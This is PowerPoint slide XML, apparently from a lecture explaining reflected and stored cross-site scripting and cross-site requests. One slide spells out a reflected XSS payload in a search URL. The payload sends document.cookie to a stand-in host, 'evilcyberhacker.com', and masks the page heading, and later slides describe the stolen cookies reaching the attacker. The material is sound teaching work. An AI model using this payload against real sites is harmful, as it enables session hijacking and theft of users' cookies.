              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>first.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Search?searchTerm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0432FF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>’);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>”);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>=“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>evilcyberhacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>LogCookies?cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>=”+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>document.cookie;document.body.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>);$(‘h2’).text(‘Nothing interesting here to see at all…’);//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>It exploits the reflective behavior of the search page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48751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1003788" y="112713"/>
            <a:ext cx="7772400" cy="892175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69638"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051" y="895350"/>
            <a:ext cx="4113212"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Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1184763" y="317500"/>
            <a:ext cx="7407275" cy="2311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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>As soon as someone clicks on the URL:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196404" y="2040466"/>
            <a:ext cx="7912100" cy="3860800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8020538" y="2794000"/>
            <a:ext cx="1003300" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3753649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918994" y="112713"/>
            <a:ext cx="7772400" cy="892175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69638"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257" y="895350"/>
            <a:ext cx="4113212"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Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1099969" y="317500"/>
            <a:ext cx="7407275" cy="2311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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>By checking the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t> tool, we see the malicious GET request going to the attacker’s website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1107380" y="2154767"/>
            <a:ext cx="7785100" cy="4127500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1134296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995527" y="112713"/>
            <a:ext cx="7772400" cy="892175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69638"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790" y="895350"/>
            <a:ext cx="4113212"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Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1176502" y="317500"/>
            <a:ext cx="7659688" cy="2311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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Expanding this malicious request, we see all the user’s cookies stolen and sent to the attacker’s website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2590799"/>
            <a:ext cx="9144000" cy="2556933"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6444208" y="4437112"/>
            <a:ext cx="648072"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87323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899592" y="112713"/>
            <a:ext cx="7772400" cy="892175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69638"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855" y="895350"/>
            <a:ext cx="4113212"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Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1080567" y="317500"/>
            <a:ext cx="8063433" cy="2311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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Checking the page source, this is where the malicious JavaScript code is reflected back and executed in the browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2726432"/>
            <a:ext cx="9144000" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2612406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1043608" y="548680"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Persistent (Stored) XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="94" name="Shape 94"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2195736" y="1916832"/>
            <a:ext cx="5760640" cy="3312368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2200979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1043608" y="548680"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Persistent (Stored) XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Shape 93"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="1556792"/>
            <a:ext cx="7316507" cy="4248472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attackers directly send their data to a target website/server which stores the data in a persistent storage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the website later sends the stored data to other users, it creates a channel between the users and the attackers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example: User profile in a social network is a channel as it is set by one user and viewed by another. Similarly, user reviews are a channel.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3498854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971600" y="404664"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Cross-Site Requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Shape 67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259632" y="1340768"/>
            <a:ext cx="7344816" cy="4536504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>When a page from a website sends an HTTP request back to the website, it is called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0432FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>same-site request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>If a request is sent to a different website, it is called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0432FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cross-site request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>because where the page comes from and where the request goes are different.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>: A webpage (not Facebook) can include a Facebook link, so when users click on the link, an HTTP request is sent to Facebook.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382228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1043608" y="476672"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Persistent (Stored) XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Shape 100"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="1255485"/>
            <a:ext cx="7848872" cy="4555200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>These channels are supposed to be data channels. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>But data provided by users can contain HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>markups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and JavaScript code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the input is not sanitized properly by the website, it is sent to other users’ browsers through the channel and gets executed by the browsers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Browsers treat it like any other code coming from the website. Therefore, the code is given the same privileges as that from the website.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17546894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1105346" y="112713"/>
            <a:ext cx="7772400" cy="892175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
